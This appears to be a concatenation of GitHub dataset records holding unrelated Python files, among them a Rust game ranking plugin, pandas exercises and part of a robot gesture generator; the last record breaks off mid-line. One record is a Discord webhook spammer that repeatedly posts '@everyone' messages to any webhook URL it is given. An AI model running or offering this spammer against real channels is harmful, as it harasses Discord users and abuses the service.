\n\"\"\"\n\nietapoints = []\nshapepoints = []\nEpoints = []\nfor i in range(0,16):\n ietapoints.append(i)\n\nfor i in range(0,16):\n shapepoints.append(i)\n\nfor i in range(0,16):\n Epoints.append(i)\n\ngbr2luts = []\n\ngbr2luts.append(GBR2LUTEmulator_test_newcal())\ngbr2luts[-1].name = regresionName\ngbr2luts[-1].inputFileName = inputFile\ngbr2luts[-1].outputFileName = outputDir+gbr2luts[-1].name+ suffix\ngbr2luts[-1].sortedShapes = sortedShapesFile\ngbr2luts[-1].variablePoints.append((\"abs(compressedieta)\",ietapoints))\ngbr2luts[-1].variablePoints.append((\"compressedE\",Epoints))\ngbr2luts[-1].variablePoints.append((\"compressedsortedshape\",shapepoints))\ngbr2luts[-1].retrieveForest()\ngbr2luts[-1].createLUT(header)\n\n","repo_name":"ats2008/L1EGCalibrations","sub_path":"Calibration/RegressionTraining/produceCalibrationLUTwithoutShapes.py","file_name":"produceCalibrationLUTwithoutShapes.py","file_ext":"py","file_size_in_byte":2141,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"22886647191","text":"#User function Template for python3\n\nclass Solution:\n def minValue(self, a, b, n):\n # Your code goes here\n a.sort()\n b.sort(reverse=True)\n sm=0\n for i in range(n):\n sm+=a[i]*b[i]\n return sm\n","repo_name":"Lalith3470/GeeksforGeeks","sub_path":"Minimize the sum of product.py","file_name":"Minimize the sum of product.py","file_ext":"py","file_size_in_byte":246,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"23188190723","text":"from discord_webhook import DiscordWebhook, DiscordEmbed\r\nfrom time import sleep\r\n\r\nprint(\"\"\" _____ \r\n/ ___| \r\n\\ `--. _ __ __ _ _ __ ___ _ __ ___ ___ _ __ \r\n `--. \\ '_ \\ / _` | '_ ` _ \\| '_ ` _ \\ / _ \\ '__|\r\n/\\__/ / |_) | (_| | | | | | | | | | | | __/ | \r\n\\____/| .__/ \\__,_|_| |_| |_|_| |_| |_|\\___|_| \r\n | | \r\n |_| \r\n\"\"\")\r\nprint(\"Made by https://github.com/racialgamer\")\r\nmsg = input(\"Webhook Embed Message: \")\r\nURL = input(\"Webhook URL: \")\r\namount = input(\"How many times to send: \")\r\nseconds = input(\"How many seconds delay between messages: \")\r\n\r\namount = int(amount)\r\nseconds = int(seconds)\r\n\r\nwebhook = DiscordWebhook(url=URL, avatar_url=\"https://avatars.githubusercontent.com/u/121128992?v=4\", username=\"Webhook Spammer by RacialGamer\", content=\"@everyone\", rate_limit_retry=True)\r\n\r\nembed = DiscordEmbed(title='Spammed',description=msg, color='880808')\r\nembed.set_author(name='RacialGamer Spammer Bot (Link)', url='https://github.com/racialgamer', icon_url='https://avatars.githubusercontent.com/u/121128992?v=4')\r\n\r\nwebhook.add_embed(embed)\r\n\r\nfor i in range(amount):\r\n sleep(seconds)\r\n webhook.execute()","repo_name":"RacialGamer/webhook-spammer","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1296,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"31"} +{"seq_id":"5200515718","text":"import re\nimport time\nimport BasePlayer\nfrom UnityEngine import Vector3\nfrom System import Action\n\nDEV = False\nLATEST_CFG = 1.0\nLINE = '-' * 50\n\nclass RankME:\n\n def __init__(self):\n\n self.Title = 'Rank-ME'\n self.Version = V(1, 0, 1)\n self.Author = 'SkinN'\n self.Description = 'Simple ranking system based on player statistics'\n self.ResourceId = 1074\n\n # --------------------------------------------------------------------------\n def Init(self):\n\n self.console(LINE)\n\n # CONFIGURATION\n if self.Config['CONFIG_VERSION'] < LATEST_CFG or DEV:\n self.UpdateConfig()\n\n global MSG, PLUGIN, COLOR, STRINGS\n MSG, COLOR, PLUGIN, STRINGS = [self.Config[x] for x in ('MESSAGES','COLORS','SETTINGS', 'STRINGS')]\n\n self.prefix = '<%s>%s' % (COLOR['PREFIX'], PLUGIN['PREFIX']) if PLUGIN['PREFIX'] else None\n self.dbname = 'rankme_db'\n self.keys = ('KILLS', 'DEATHS', 'KDR', 'SUICIDES', 'SUICIDE RATIO', 'ANIMALS', 'RANGE', 'SLEEPERS')\n self.cache = {}\n\n # LOAD DATABASE\n self.db = data.GetData(self.dbname)\n\n # CHECK ACTIVE PLAYERS\n for player in self.playerlist():\n self.check_player(player)\n self.console('* Loading database and verifying players.')\n\n # START AUTO-SAVE LOOP\n mins = PLUGIN['AUTO-SAVE INTERVAL']\n if mins:\n secs = mins * 60 if mins else 60\n self.adverts_loop = timer.Repeat(secs, 0, Action(self.save_data), self.Plugin)\n self.console('* Starting Auto-Save loop, set to %s minute/s' % mins)\n else:\n self.autosave_interval = None\n self.console('* Auto-Save is disabled')\n\n # COMMANDS\n self.cmds = []\n for cmd in [x for x in self.Config['COMMANDS'].keys()]:\n if PLUGIN['ENABLE %s CMD' % cmd]:\n self.cmds.append(cmd)\n command.AddChatCommand(self.Config['COMMANDS'][cmd], self.Plugin, '%s_CMD' % cmd.replace(' ', '_').lower())\n\n self.console('* Enabling commands:')\n if self.cmds:\n for cmd in self.cmds:\n self.console(' - /%s (%s)' % (self.Config['COMMANDS'][cmd], cmd.title()))\n else: self.console(' - No commands enabled')\n\n command.AddConsoleCommand('rankme.savedb', self.Plugin, 'save_data')\n command.AddConsoleCommand('rankme.wipedb', self.Plugin, 'console_wipe_CMD')\n command.AddChatCommand('rankme', self.Plugin, 'plugin_CMD')\n\n self.console(LINE)\n\n # --------------------------------------------------------------------------\n def Unload(self):\n\n # SAVE DATABASE\n self.save_data()\n\n # ==========================================================================\n # <>> CONFIGURATION\n # ==========================================================================\n def LoadDefaultConfig(self):\n\n self.Config = {\n 'CONFIG_VERSION': LATEST_CFG,\n 'SETTINGS': {\n 'PREFIX': self.Title,\n 'BROADCAST TO CONSOLE': True,\n 'AUTO-SAVE INTERVAL': 10,\n 'DATABASE RESET AUTHLEVEL': 2,\n 'DATABASE SAVE AUTHLEVEL': 1,\n 'TOP MAX PLAYERS': 10,\n 'SHOW TOP IN CHAT': True,\n 'SHOW TOP IN CONSOLE': False,\n 'SHOW RANK IN CHAT': True,\n 'SHOW RANK IN CONSOLE': False,\n 'ANNOUNCE DATABASE WIPE': True,\n 'ENABLE SAVE DATA CMD': True,\n 'ENABLE WIPE DATA CMD': True,\n 'ENABLE PLAYERS RESET CMD': True,\n 'ENABLE RANK CMD': True,\n 'ENABLE TOP CMD': True,\n },\n 'MESSAGES': {\n 'DATA SAVED': 'Database has been saved.',\n 'DATABASE WIPED': 'Database has been wiped.',\n 'PLAYER RESETED': 'Your rank has been reseted.',\n 'RANK INFO': 'Your Ranking Info',\n 'NOT RANKED': 'Not ranked yet!',\n 'TOP TITLE': 'Top {list}',\n 'CHECK CONSOLE NOTE': 'Check the console (press F1) for more info.',\n 'TOP DESC': '/top - Shows the top kills list, or any other list like deaths, kdr, etc.',\n 'RANK DESC': '/rank - Shows your rank information',\n 'PLAYERS RESET DESC': '/resetme - Resets your rank',\n 'WIPE DATA DESC': '/wipedb - Resets the ranking database, and starts a new one. (Admins Only)',\n 'SAVE DATA DESC': '/savedb - Saves the database. (Admins Only)',\n 'HELP DESC': 'Rank-ME - Type /rankme help for all available commands.',\n 'AVAILABLE COMMANDS': 'Available Commands',\n 'LIST NOT FOUND': 'List not found. Here are the available lists:',\n 'NO PLAYERS TO LIST': 'There aren\\'t yet players with positive values to show the {list} list.'\n },\n 'STRINGS': {\n 'NO ACCESS': 'Access Restricted.',\n 'RANK': 'Rank Position',\n 'NAME': 'Name',\n 'KILLS': 'Player Kills',\n 'DEATHS': 'Deaths',\n 'KDR': 'Kill/Death Ratio',\n 'SUICIDES': 'Suicides',\n 'SUICIDE RATIO': 'Suicide Ratio',\n 'ANIMALS': 'Animal Kills',\n 'RANGE': 'Range',\n 'SLEEPERS': 'Sleepers'\n },\n 'COLORS': {\n 'PREFIX': 'orange',\n 'SYSTEM': 'lime'\n },\n 'COMMANDS': {\n 'SAVE DATA': 'savedb',\n 'WIPE DATA': 'wipedb',\n 'PLAYERS RESET': 'resetme',\n 'RANK': 'rank',\n 'TOP': 'top'\n },\n }\n\n self.console('* Loading default configuration file', True)\n\n # --------------------------------------------------------------------------\n def UpdateConfig(self):\n\n # IS OLDER CONFIG TOO OLD?\n if self.Config['CONFIG_VERSION'] <= LATEST_CFG - 0.2 or DEV:\n\n self.console('* Current configuration file is two or more versions older than the latest (Current: v%s / Latest: v%s)' % (self.Config['CONFIG_VERSION'], LATEST_CFG), True)\n\n # RESET CONFIGURATION\n self.Config.clear()\n\n # LOAD DEFAULTS CONFIGURATION\n self.LoadDefaultConfig()\n\n else:\n\n self.console('* Applying new changes to the configuration file (Version: %s)' % LATEST_CFG, True)\n\n # NEW VERSION VALUE\n self.Config['CONFIG_VERSION'] = LATEST_CFG\n\n # NEW CHANGES\n self.Config['STRINGS']['RANGE'] = self.Config['STRINGS']['LONGEST SHOT']\n del self.Config['STRINGS']['LONGEST SHOT']\n\n # SAVE CHANGES\n self.SaveConfig()\n\n # --------------------------------------------------------------------------\n def save_data(self, args=None):\n\n data.SaveData(self.dbname)\n self.console('Saving database')\n\n # --------------------------------------------------------------------------\n def reset_data(self):\n\n if self.db: self.db.clear()\n self.console('Reseting database')\n self.save_data()\n for player in self.playerlist():\n self.check_player(player)\n\n # ==========================================================================\n # <>> MESSAGE FUNTIONS\n # ==========================================================================\n def console(self, text, force=False):\n\n if self.Config['SETTINGS']['BROADCAST TO CONSOLE'] or force:\n print('[%s v%s] :: %s' % (self.Title, str(self.Version), self._format(text, True)))\n\n # --------------------------------------------------------------------------\n def pconsole(self, player, text, color='white'):\n\n player.SendConsoleCommand(self._format('echo <%s>%s' % (color, text)))\n\n # --------------------------------------------------------------------------\n def say(self, text, color='white', userid=0, force=True):\n\n if self.prefix and force:\n rust.BroadcastChat(self._format('[ %s ] <%s>%s' % (self.prefix, color, text)), None, str(userid))\n else:\n rust.BroadcastChat(self._format('<%s>%s' % (color, text)), None, str(userid))\n self.console(self._format(text, True))\n\n # --------------------------------------------------------------------------\n def tell(self, player, text, color='white', userid=0, force=True):\n\n if self.prefix and force:\n rust.SendChatMessage(player, self._format('[ %s ] <%s>%s' % (self.prefix, color, text)), None, str(userid))\n else:\n rust.SendChatMessage(player, self._format('<%s>%s' % (color, text)), None, str(userid))\n\n # --------------------------------------------------------------------------\n def _format(self, text, con=False):\n\n colors = (\n 'red', 'blue', 'green', 'yellow', 'white', 'black', 'cyan',\n 'lightblue', 'lime', 'purple', 'darkblue', 'magenta', 'brown',\n 'orange', 'olive', 'gray', 'grey', 'silver', 'maroon'\n )\n\n name = r'\\<(\\w+)\\>'\n hexcode = r'\\<(#\\w+)\\>'\n end = ''\n\n if con:\n for x in (end, name, hexcode):\n if x.startswith('#') or x in colors:\n text = re.sub(x, '', text)\n else:\n text = text.replace(end, '')\n for f in (name, hexcode):\n for c in re.findall(f, text):\n if c.startswith('#') or c in colors:\n text = text.replace('<%s>' % c, '' % c)\n return text\n\n # ==========================================================================\n # <>> PLAYER HOOKS\n # ==========================================================================\n def OnPlayerInit(self, player):\n\n self.check_player(player)\n\n # ==========================================================================\n # <>> PLAYER HOOKS\n # ==========================================================================\n def OnEntityDeath(self, victim, hitinfo):\n\n ini = hitinfo.Initiator if hitinfo else None\n att_ent = ini if ini and ini.ToPlayer() else None\n\n if victim and victim.ToPlayer():\n\n dmg = str(victim.lastDamage).upper()\n vic_sid = self.playerid(victim)\n vic_dic = self.db[vic_sid]\n\n if dmg == 'SUICIDE':\n\n vic_dic['SUICIDES'] += 1\n if vic_dic['DEATHS']:\n vic_dic['SUICIDE RATIO'] = self.sfloat(float(vic_dic['SUICIDES']) / vic_dic['DEATHS'])\n\n elif att_ent and dmg in ('SLASH', 'BLUNT', 'STAB', 'BULLET', 'BITE'):\n\n att_sid = self.playerid(att_ent)\n att_dic = self.db[att_sid]\n\n if victim.IsSleeping():\n att_dic['SLEEPERS'] += 1\n else:\n att_dic['KILLS'] += 1\n\n if att_dic['DEATHS']:\n att_dic['KDR'] = self.sfloat(float(att_dic['KILLS']) / att_dic['DEATHS'])\n\n d = float('%2f' % Vector3.Distance(victim.transform.position, att_ent.transform.position))\n if d > att_dic['RANGE']:\n att_dic['RANGE'] = d\n\n self.db[att_sid].update(att_dic)\n\n vic_dic['DEATHS'] += 1\n if vic_dic['DEATHS']:\n vic_dic['KDR'] = self.sfloat(float(vic_dic['KILLS']) / vic_dic['DEATHS'])\n\n self.db[vic_sid].update(vic_dic)\n\n elif victim and 'animals' in str(victim) and att_ent:\n\n att_sid = self.playerid(att_ent)\n att_dic = self.db[att_sid]\n\n att_dic['ANIMALS'] += 1\n d = float('%.2f' % Vector3.Distance(victim.transform.position, att_ent.transform.position))\n if d > att_dic['RANGE']:\n att_dic['RANGE'] = d\n\n self.db[att_sid].update(att_dic)\n\n # ==========================================================================\n # <>> FUNCTIONS\n # ==========================================================================\n def playerid(self, player):\n\n return rust.UserIDFromPlayer(player)\n\n # --------------------------------------------------------------------------\n def playerlist(self):\n\n return list(BasePlayer.activePlayerList) + list(BasePlayer.sleepingPlayerList)\n\n # --------------------------------------------------------------------------\n def playerauth(self, player):\n\n return player.net.connection.authLevel\n\n # --------------------------------------------------------------------------\n def getsorted(self, l):\n\n m = PLUGIN['TOP MAX PLAYERS']\n return sorted(self.db, key=lambda player: self.db[player][l], reverse=True)[:m if m and m < 21 else 10]\n\n # --------------------------------------------------------------------------\n def sfloat(self, f):\n\n return float('%.2f' % f)\n\n # --------------------------------------------------------------------------\n def check_player(self, player, reset=False):\n\n steamid = self.playerid(player)\n if len(steamid) == 17:\n if steamid not in self.db or reset:\n self.db[steamid] = {\n 'NAME': player.displayName,\n 'KILLS': 0,\n 'DEATHS': 0,\n 'KDR': 0.0,\n 'SUICIDES': 0,\n 'SUICIDE RATIO': 0.0,\n 'ANIMALS': 0,\n 'RANGE': 0.0,\n 'SLEEPERS': 0\n }\n else:\n a = self.db[steamid]\n a['NAME'] = player.displayName\n if 'LONGEST SHOT' in a:\n a['RANGE'] = a['LONGEST SHOT']\n del a['LONGEST SHOT']\n if 'STEAMID' in a:\n del a['STEAMID']\n self.db[steamid].update(a)\n\n # ==========================================================================\n # <>> COMMANDS\n # ==========================================================================\n def save_data_CMD(self, player, cmd, args):\n\n if self.playerauth(player) >= PLUGIN['DATABASE SAVE AUTHLEVEL']:\n self.save_data()\n self.tell(player, MSG['DATA SAVED'], COLOR['SYSTEM'])\n else: self.tell(player, MSG['NO ACCESS'], COLOR['SYSTEM'])\n\n # --------------------------------------------------------------------------\n def wipe_data_CMD(self, player, cmd, args):\n\n if self.playerauth(player) >= PLUGIN['DATABASE RESET AUTHLEVEL']:\n self.reset_data()\n if PLUGIN['ANNOUNCE DATABASE WIPE']:\n for x in BasePlayer.activePlayerList:\n self.tell(x, MSG['DATABASE WIPED'], COLOR['SYSTEM'])\n else: self.tell(player, MSG['NO ACCESS'], COLOR['SYSTEM'])\n\n # --------------------------------------------------------------------------\n def console_wipe_CMD(self, args):\n\n self.reset_data()\n if PLUGIN['ANNOUNCE DATABASE WIPE']:\n for x in BasePlayer.activePlayerList:\n self.tell(x, MSG['DATABASE WIPED'], COLOR['SYSTEM'])\n\n # --------------------------------------------------------------------------\n def players_reset_CMD(self, player, cmd, args):\n\n del self.db[self.playerid(player)]\n self.check_player(player)\n self.say(MSG['PLAYER RESETED'], COLOR['SYSTEM'])\n\n # --------------------------------------------------------------------------\n def rank_CMD(self, player, cmd, args):\n\n steamid = self.playerid(player)\n target = self.db[steamid]\n rank = 0\n for a, b in enumerate(self.getsorted('KILLS')):\n if b == steamid:\n rank = a + 1\n l = [\n '%s | %s:' % (self.prefix, MSG['RANK INFO']),\n LINE\n ]\n if target['KILLS']:\n l.append('%s: %s / %s' % (STRINGS['RANK'], rank, len(self.db)))\n else:\n l.append(('%s : %s' % (STRINGS['RANK'], MSG['NOT RANKED'])))\n for i in self.keys:\n l.append(('%s : %s' % (STRINGS[i], target[i])))\n for i in l:\n if PLUGIN['SHOW RANK IN CHAT']:\n if isinstance(i, tuple):\n self.tell(player, *i, force=False)\n else:\n self.tell(player, i, force=False)\n if PLUGIN['SHOW RANK IN CONSOLE']:\n if isinstance(i, tuple):\n self.pconsole(player, *i)\n else:\n self.pconsole(player, i)\n if PLUGIN['SHOW RANK IN CONSOLE']:\n self.pconsole(player, LINE)\n self.tell(player, LINE, force=False)\n self.tell(player, MSG['CHECK CONSOLE NOTE'], COLOR['SYSTEM'], force=False)\n self.tell(player, LINE, force=False)\n\n # --------------------------------------------------------------------------\n def top_CMD(self, player, cmd, args):\n\n key = 'KILLS'\n if args:\n args = ' '.join(args).upper()\n if args in self.keys:\n key = args\n else:\n self.tell(player, MSG['LIST NOT FOUND'], COLOR['SYSTEM'])\n self.tell(player, ', '.join(['%s' % x.lower() for x in self.keys]))\n return\n l = self.getsorted(key)\n l = [x for x in l if self.db[x][key]]\n if l:\n lines = [\n '%s | %s:' % (self.prefix, MSG['TOP TITLE'].format(list=STRINGS[key])),\n LINE\n ]\n for n, p in enumerate(l):\n i = self.db[p]\n lines.append(('%s. %s: %s' % (n+1, i['NAME'], i[key]), p))\n lines.append(LINE)\n if PLUGIN['SHOW TOP IN CONSOLE']:\n for i in lines:\n if isinstance(i, tuple):\n a, b = i\n self.pconsole(player, a)\n else:\n self.pconsole(player, i)\n if PLUGIN['SHOW TOP IN CHAT']:\n if PLUGIN['SHOW TOP IN CONSOLE']:\n lines.append('<%s>%s' % (COLOR['SYSTEM'], MSG['CHECK CONSOLE NOTE']))\n lines.append(LINE)\n for i in lines:\n if isinstance(i, tuple):\n a, b = i\n self.tell(player, a, 'white', b, False)\n else:\n self.tell(player, i, force=False)\n else:\n self.tell(player, MSG['NO PLAYERS TO LIST'].format(list=STRINGS[key]), COLOR['SYSTEM'])\n\n # --------------------------------------------------------------------------\n def plugin_CMD(self, player, cmd, args):\n\n if args and 'help' in args:\n self.tell(player, '%s | %s:' % (self.Title, MSG['AVAILABLE COMMANDS']), force=False)\n self.tell(player, LINE, force=False)\n for cmd in self.Config['COMMANDS']:\n self.tell(player, MSG['%s DESC' % cmd], 'yellow', force=False)\n self.tell(player, LINE, force=False)\n else:\n self.tell(player, LINE, force=False)\n self.tell(player, '%s v%s by SkinN' % (self.Title.upper(), self.Version), force=False)\n self.tell(player, self.Description, 'lime', force=False)\n self.tell(player, '| RESOURSE ID: %s | CONFIG: v%s |' % (self.ResourceId, self.Config['CONFIG_VERSION']), force=False)\n self.tell(player, LINE, force=False)\n self.tell(player, '<< Click the icon to contact me.', userid='76561197999302614', force=False)\n\n # ==========================================================================\n # <>> MISC FUNTIONS\n # ==========================================================================\n def SendHelpText(self, player):\n\n self.tell(player, MSG['HELP DESC'], COLOR['SYSTEM'], force=False)\n\n# ==============================================================================","repo_name":"bloodyblaze/rep-Mods","sub_path":"RankME.py","file_name":"RankME.py","file_ext":"py","file_size_in_byte":20422,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"74689061207","text":"import pandas as pd #Importar o modulo pandas, Nao esquece de installar o modulo\nimport numpy as np\n#Note pd.Series has a capital S \n\nserie1=pd.Series([6,2,3,4,5,6]) #Series from a list\n\nprint(serie1)\nprint(type(serie1)) #Check the type to understand the difference\n\nhoras=[2,3,1,7,4,5,6] # From a list but with index that we want\nserie2=pd.Series(horas,index=[\"Segunda\",\"terca\",\"quarta\",\"quinta\",\"sexta\",\"Sabado\",\"Domingo\"])\nprint(serie2)\n\nhoras=[2,3,1,7,4,5,6]\nindice=[\"Segunda\",\"terca\",\"quarta\",\"quinta\",\"sexta\",\"Sabado\",\"Domingo\"]\nserie2=pd.Series(horas,index=indice)\nprint(serie2)\n\ndicio = {'Mon': 33, 'Tue': 19, 'Wed': 15, 'Thu': 89, 'Fri': 11, 'Sat': 9,\"Sun\":10}\nserie3=pd.Series(dicio)\nprint(serie3)\n\ndados=np.random.randint(10,50,5) # array from numpy\nindice=[\"um\",\"dois\",\"tres\",\"quatro\",\"cinco\"]\nserie4=pd.Series(dados,index=indice)\nprint(serie4)","repo_name":"arfan64shah/Python_Programs","sub_path":"pandasPractice.py","file_name":"pandasPractice.py","file_ext":"py","file_size_in_byte":864,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"70121727129","text":"def square(length, breadth):\n\tfor len in range(length):\n\t\tfor width in range(breadth):\n\t\t\tprint(\"*\",end=\"\")\n\t\tprint()\n\nlength,breadth = input(\"Enter a length & breadth: \").split()\nsquare(int(length), int(breadth))\n\n\ndef arrow(length):\n\tfor len in range(1, length):\n\t\tif len > (length / 2):\n\t\t\tprint(\"*\" * (length -len))\n\t\telse:\n\t\t\tprint(\"*\" * len)\n\n\nprint(\"\\nLet's make a kite too\\n\")\nlength = input(\"Enter a length for your kite: \")\narrow(int(length))\n","repo_name":"edem8/Glblcd","sub_path":"Week1/forLoop.py","file_name":"forLoop.py","file_ext":"py","file_size_in_byte":454,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"42856311332","text":"import sys\nimport os\n\nsys.path.insert(1, os.path.join(sys.path[0], '..'))\nfrom shimi import Shimi\nfrom posenet.posenet import PoseNet\nfrom utils.utils import Point, normalize_position, denormalize_position, denormalize_to_range, quantize, normalize_to_range\nfrom audio.midi_analysis import MidiAnalysis\nfrom motion.move import Move\nimport pygame.mixer as mixer\nimport random\nimport time\nimport numpy as np\n\n\nclass GenerativePhrase:\n \"\"\"Moves Shimi according to a MIDI phrase and music/movement research.\"\"\"\n\n def __init__(self, shimi=None, posenet=False):\n \"\"\"Initializes Shimi motor controller and PoseNet skeleton detection if needed.\n shimi (Shimi, optional): Defaults to None. An instance of the Shimi motor controller class.\n posenet (bool, optional): Defaults to False. Determines whether PoseNet skeleton detection should be used.\n \"\"\"\n if shimi is not None:\n self.shimi = shimi\n else:\n self.shimi = Shimi()\n\n self.posenet = None\n if posenet:\n self.posenet = PoseNet(\n self.shimi, on_pred=self.on_posenet_prediction)\n\n # PoseNet parameters\n self.face_track = False\n self.update_freq = 0.1\n self.last_update = time.time()\n self.last_pos = 0.5\n mixer.init()\n\n def on_posenet_prediction(self, pose, fps):\n \"\"\"Called when a PoseNet prediction is made.\n\n Args:\n pose (dict): The pose prediction data generated by PoseNet.\n fps (float): The current FPS average of PoseNet prediction. \n \"\"\"\n\n # **N.B.** For simplification, this isn't being loaded from the config.yaml, where it is defined.\n # I don't want to deal with the path nonsense at the moment, but could be a TODO\n POSENET_HEIGHT = 513\n POSENET_WIDTH = 513\n\n points = pose['keypoints']\n\n # Use nose as point of reference for face tracking\n nose = None\n for point in points:\n if point['part'] == 'nose':\n nose = Point(point['position']['x'],\n point['position']['y'], point['score'])\n\n if nose:\n SCORE_THRESH = 0.7\n MOVE_THRESH = 0.05\n MIN_VEL = 40\n MAX_VEL = 100\n\n # Only consider PoseNet to be valid if above SCORE_THRESH (percentage) confidence\n if nose.score > SCORE_THRESH:\n if time.time() > self.last_update + self.update_freq:\n # Calculate where to look\n # Camera image is flipped\n pos = 1 - (nose.x / POSENET_WIDTH)\n\n # Calculate speed based on how far to move\n current_pos = normalize_position(self.shimi.neck_lr,\n self.shimi.controller.get_present_speed([self.shimi.neck_lr])[0])\n vel = max(MIN_VEL + abs(current_pos - pos) *\n MAX_VEL, MIN_VEL)\n\n if abs(self.last_pos - pos) > MOVE_THRESH:\n # Only actually move the motors if specified\n if self.face_track:\n self.shimi.controller.set_moving_speed(\n {self.shimi.neck_lr: vel})\n self.shimi.controller.set_goal_position(\n {self.shimi.neck_lr: denormalize_position(self.shimi.neck_lr, pos)})\n\n self.last_pos = pos\n\n self.last_update = time.time()\n\n def generate(self, midi_path, valence, arousal, doa_value=None, wav_path=None, both=False, mute=False,\n random_movement=False, seed=None):\n \"\"\"Compute and actuate generative gesture for a given MIDI phrase and emotion.\n\n Args:\n midi_path (str): Path to the MIDI file to generate gestures for.\n valence (float): Valence value in range [-1.0, 1.0].\n arousal (float): Arouse value in range [-1.0, 1.0].\n doa_value (float, optional): Defaults to None. The current measurement of input direction of arrival from Shimi's microphone array.\n wav_path (str, optional): Defaults to None. The path to a WAV file to be played when gestures are actuated.\n both (bool, optional): Defaults to False. Determines whether or not to play synthesized MIDI file with WAV file, if present.\n mute (bool, optional): Defaults to False. Determines whether to not play audio, even if file paths are given.\n random_movement (bool, optional): Defaults to False. Determines whether or not to substitute random movement over the MIDI duration.\n seed (str, optional): Defaults to None. A seed for the RNG in order to make generation system deterministic.\n \"\"\"\n\n t = time.time()\n\n self.midi_analysis = MidiAnalysis(midi_path)\n tempo = self.midi_analysis.get_tempo()\n length = self.midi_analysis.get_length()\n\n # Create the motor moves\n moves = []\n\n if random_movement:\n foot = self.random_movement(self.shimi.foot, length, seed)\n moves.append(foot)\n torso = self.random_movement(\n self.shimi.torso, length, seed + int(seed / 3))\n moves.append(torso)\n neck_ud = self.random_movement(\n self.shimi.neck_ud, length, seed + int(seed / 5))\n moves.append(neck_ud)\n phone = self.random_movement(\n self.shimi.phone, length, seed + int(seed / 7))\n moves.append(phone)\n neck_lr = self.random_movement(\n self.shimi.neck_lr, length, seed + int(seed / 11))\n moves.append(neck_lr)\n else:\n foot = self.foot_movement(tempo, length, valence, arousal)\n moves.append(foot)\n torso = self.torso_movement(valence, arousal)\n moves.append(torso)\n neck_ud = self.neck_ud_movement(length, valence, arousal, torso)\n moves.append(neck_ud)\n phone = self.phone_movement_onsets(tempo, length, valence, arousal)\n moves.append(phone)\n\n if not self.posenet:\n if not doa_value:\n neck_lr = self.neck_lr_movement(\n tempo, length, valence, arousal)\n else:\n neck_lr = self.neck_lr_doa_movement(\n tempo, length, doa_value, valence, arousal)\n moves.append(neck_lr)\n\n # Load wav file if given\n if wav_path:\n mixer.music.load(wav_path)\n\n # Start all the moves\n for move in moves:\n move.start()\n\n self.face_track = True # Turn on face tracking\n\n # Play audio if given\n if not mute:\n if wav_path and not both:\n mixer.music.play()\n elif wav_path and both:\n mixer.music.play()\n self.midi_analysis.play()\n else:\n # For testing, play the MIDI file back\n self.midi_analysis.play()\n\n # Wait for all the moves to stop\n for move in moves:\n move.join()\n\n self.face_track = False # Turn off face tracking\n self.shimi.initial_position()\n\n def neck_lr_doa_movement(self, tempo, length, doa_value, valence, arousal):\n \"\"\"Moves neck left and right according to where the microphone detects input.\n\n Args:\n tempo (float): Tempo of the MIDI file in seconds per beat.\n length (float): Length of the MIDI file in seconds.\n doa_value (float): The current measurement of input direction of arrival from Shimi's microphone array.\n valence (float): Valence value in range [-1.0, 1.0].\n arousal (float): Arouse value in range [-1.0, 1.0].\n\n Returns:\n Move: A Thread of properly sequenced movements.\n \"\"\"\n # 120 left, 30 right\n normalized_doa = normalize_to_range(doa_value, 120, 30)\n normalized_arousal = (arousal + 1) / 2\n\n print(\"::: DOA: %f, normalized: %f :::\" % (doa_value, normalized_doa))\n\n move_dur = 2 * tempo * ((1 - normalized_arousal) + 0.25)\n neck_lr_move = Move(self.shimi, self.shimi.neck_lr,\n normalized_doa, move_dur)\n\n t = tempo\n delay = 0.0\n while t < length:\n rest = random.choice([True, False])\n if rest: # Occasionally don't move, makes gesture seem more realistic\n rest_dur = 2 * tempo * random.random()\n delay += rest_dur\n t += rest_dur\n else: # Move to approximate DOA location with emotion-dependent speed\n new_pos = normalized_doa + \\\n (random.choice([-1, 1]) * ((1 + valence) / 2) * 0.3)\n move_dur = 2 * tempo * ((1 - normalized_arousal) + 0.25)\n neck_lr_move.add_move(new_pos, move_dur, delay=delay)\n delay = 0.0\n t += move_dur\n\n return neck_lr_move\n\n def neck_lr_movement(self, tempo, length, valence, arousal):\n \"\"\"Moves neck left and right according to music and movement research.\n\n Args:\n tempo (float): Tempo of the MIDI file in seconds per beat.\n length (float): Length of the MIDI file in seconds.\n valence (float): Valence value in range [-1.0, 1.0].\n arousal (float): Arouse value in range [-1.0, 1.0].\n\n Returns:\n Move: A Thread of properly sequenced movements.\n \"\"\"\n # Toiviainen (2-beat rotation of upper torso)\n # Burger (High valence -> more rotation)\n # Sievers (High valence and high arousal -> smoothness)\n two_beat_dur = tempo * 2\n\n normalized_valence = (valence + 1) / 2\n rot_range = denormalize_to_range(normalized_valence, 0.2, 0.5)\n\n vel_algo = 'constant'\n\n if arousal >= 0: # Continuous movement if arousal > 0\n delay = 0\n if valence >= 0:\n vel_algo = 'linear_ad'\n else:\n two_beat_dur = tempo # Angry shakes every beat\n else:\n if arousal >= -0.5: # Wait a beat between movements\n delay = tempo\n else: # Wait 2 beats between movements\n delay = 2 * tempo\n\n # To keep deterministic for experiments, look in positive directions first\n initial_pos = 0.5 + (rot_range / 2)\n neck_lr_move = Move(self.shimi, self.shimi.neck_lr,\n initial_pos, two_beat_dur / 2, vel_algo=vel_algo)\n\n t = two_beat_dur / 2\n dir = -1\n\n while t < length:\n new_pos = 0.5 + ((dir * rot_range) / 2)\n neck_lr_move.add_move(new_pos, two_beat_dur, delay=delay)\n t += (delay + two_beat_dur)\n dir = dir * -1\n\n return neck_lr_move\n\n def neck_ud_movement(self, length, valence, arousal, torso):\n \"\"\"Moves neck up and down according to music and movement research.\n\n Args:\n length (float): Length of the MIDI file in seconds.\n valence (float): Valence value in range [-1.0, 1.0].\n arousal (float): Arouse value in range [-1.0, 1.0].\n torso (Move): Sequenced movements of the torso.\n\n Returns:\n Move: A Thread of properly sequenced movements.\n \"\"\"\n # Note: ~0.2 of neck movement accounts for torso\n # looking straight: tor 0.7 neck 0.7, tor 0.8 neck 